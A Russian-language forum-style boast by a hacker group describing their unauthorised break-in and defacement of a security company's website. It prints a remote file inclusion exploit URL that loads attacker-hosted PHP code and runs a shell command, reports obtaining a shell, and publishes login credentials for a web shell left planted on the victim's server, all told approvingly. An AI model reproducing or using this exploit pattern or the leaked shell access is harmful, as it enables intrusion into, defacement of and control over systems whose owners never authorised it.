В общем сидели мы с DodBoB и по аське трещали.... И тут разговор зашел
о посещаемости паги нашего проекта и работе
колkектива... Типа команде уже 3 месяца, а серьезных работ нет и
пора бы задуматься о посещаемости ресурса. Сразу высказали несколько идей
- от массовых (красивых) дефейсов, до выкладывания
чего-то вкусненького (шеллы, аськи и т.д.)... Второе
как-то отпало сразу и было принято решение отдефейсить
нечто серьезное. Тут постучался Shift и говорит: есть
предложение - www.dsec.ru
- пойдем, типа, поковыряем.
Первым делом мы решили посмотреть где же dsec.ru хоститься, хостером оказался
tau.agava.net =) Сразу появилось предположение, что
хозяева данного сайта либо слишком зазнались со своим "кондором"
(система анализа ИТ рисков), либо денег пожалели... =)
Хостинг нас очень порадовал, поэтому предположили, если такое
наплевательское отношение к жилью, то ко всему
остальному такое же...
Первое, что бросилось в глаза это голосование... Не долго думая я
я создал папку и файлик на моей народовской страничке http://censored/lang/english.php
с текстом:
Exploit code:
http://dsec/poll/admin/common.inc.php?base_path=http://censored/lang/english.php&e=id;
Шелл получен. Честно говоря я охренел... Шелл
с правами юзера dsec57 =) Сразу был сделан
анализ исходных кодов ресурса, было обнаружено еще две
уязвимости, но я о них умолчу, потому как если нашему проекту будут
поступать угрозы от dsec "экспертов", мы бы могли немедленно ответить.
После осмотра был залит дефейс с нашего shell_phantom`a , вы его можете посмотреть
в новостях:http://www.xakep.ru/post/24516/
Хотелось бы отметить наплевательское отношение, админов к собственной
безопасности и отсутствие способностей к анализу вторжений и
собственных исходных кодов. Проверить
компетентность DSEC "экспертов" вы можете прямо тут и сечайсlogin:r57
passwd:r57Удаленный cgi шелл в вашем распоряжении.
Best Regards eyes & dodbob (SSQUAD TEAM)
P.S. И эти люди занимаются penetration тестингом... Воистину ваша безопасность
в ваших руках.